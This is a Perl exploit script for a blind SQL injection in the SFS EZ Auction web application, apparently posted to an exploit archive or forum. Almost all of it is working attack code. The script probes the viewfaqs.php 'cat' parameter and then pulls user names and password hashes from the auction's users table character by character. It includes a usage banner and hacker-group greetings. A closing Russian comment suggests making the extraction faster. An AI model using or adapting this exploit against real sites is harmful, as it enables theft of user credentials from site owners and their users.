SFS Auction Blind sql injection Exploit Code: #!/usr/bin/perl -w use strict; use LWP::Simple; $| = 1; print q { ::::::::::::::::::::::::::::::::::::::::::::::::::: :: SFS EZ Auction Blind sql injection exploit :: :: written by Dimi4 :: ::::::::::::::::::::::::::::::::::::::::::::::::::: [~] Greetz: [~] UASC uasc.org.ua [~] ANTICHAT forum.antichat.ru }; if (@ARGV < 1) { print "Usage: perl exploit.pl [url] \nExample: perl exploit.pl www.target.com/demo\n"; exit; } my $page = shift; my $uid = shift; my $prefix; my @charset = ('a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z','A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z','0','1','2','3','4','5','6','7','8','9',':'); print "[x] Vulnerability check...\n"; my $chreq = get("http://".$page."/viewfaqs.php?cat=1+and+1=0"); if (($chreq =~ m/DWarning/i) || ($chreq =~ m/mysql_result()/i)) { print "[x] Seems to be vulnerable!\n"; } else { print "[o] Seems to be patched, sorry\n"; exit; } print "[+] Getting hash...\n"; print "[+] Hash: "; my $curnum = 1; while($curnum < 62) { my $false_result = get("http://".$page."/viewfaqs.php?cat=1+and+1=1+and+ascii(substring(version(),".$curnum.",1))=-1"); foreach(@charset) { my $ascode = ord($_); my $result = get("http://".$page."/viewfaqs.php?cat=1+and+1=1+and+ascii(substring((SELECT+concat_ws(0x3a,name,password)+from+PHPAUCTION_users),".$curnum.",1))=".$ascode); if (length($result) != 0) { if (length($result) != length($false_result)) { print chr($ascode); $curnum++; } } } } print "\n[+] Done!\n";
Dimi4Слать по 63 запроса на символ - не клёво. Тем более если можно обойтись в худшем случае 6 запросами.
